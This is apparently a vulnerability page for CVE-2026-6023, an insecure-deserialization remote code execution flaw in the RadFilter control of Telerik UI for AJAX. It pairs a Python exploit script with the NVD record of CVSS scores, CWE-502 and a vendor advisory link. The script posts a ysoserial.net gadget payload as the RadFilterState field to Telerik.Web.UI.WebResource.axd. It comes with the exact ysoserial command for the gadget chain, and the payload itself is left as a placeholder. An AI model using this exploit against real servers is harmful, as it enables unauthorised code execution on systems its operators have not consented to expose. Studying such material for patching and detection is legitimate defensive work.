CVE-2026-6023

import requests # Target URL (Example) target_url = "http://target-site/Telerik.Web.UI.WebResource.axd" # Generate payload using ysoserial.net # Command: ysoserial.exe -g ActivitySurrogateSelector -c "calc.exe" -f ObjectStateFormatter # Note: This requires a pre-generated payload string for the specific formatter used by Telerik. malicious_payload = "<PASTE_GENERATED_PAYLOAD_HERE>" # Data structure for RadFilter state (example structure) data = { "RadFilterState": malicious_payload } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=data, headers=headers) if response.status_code == 200: print("Payload sent successfully. Check for execution.") else: print(f"Server returned: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-6023", "sourceIdentifier": "[email protected]", "published": "2026-04-22T08:16:13.040", "lastModified": "2026-05-05T18:39:06.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Progress® Telerik® UI for AJAX versions 2024.4.1114 through 2026.1.421, the RadFilter control is vulnerable to insecure deserialization when restoring filter state if the state is exposed to the client. If an attacker tampers with this state, a server-side remote code execution is possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:telerik_ui_for_asp.net_ajax:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.4.1114", "versionEndExcluding": "2026.1.421", "matchCriteriaId": "B012BE59-AF83-4A7E-A693-11B6E0ACB2C2"}]}]}], "references": [{"url": "https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/kb-security-deserialization-of-untrusted-data-cve-2026-6023", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}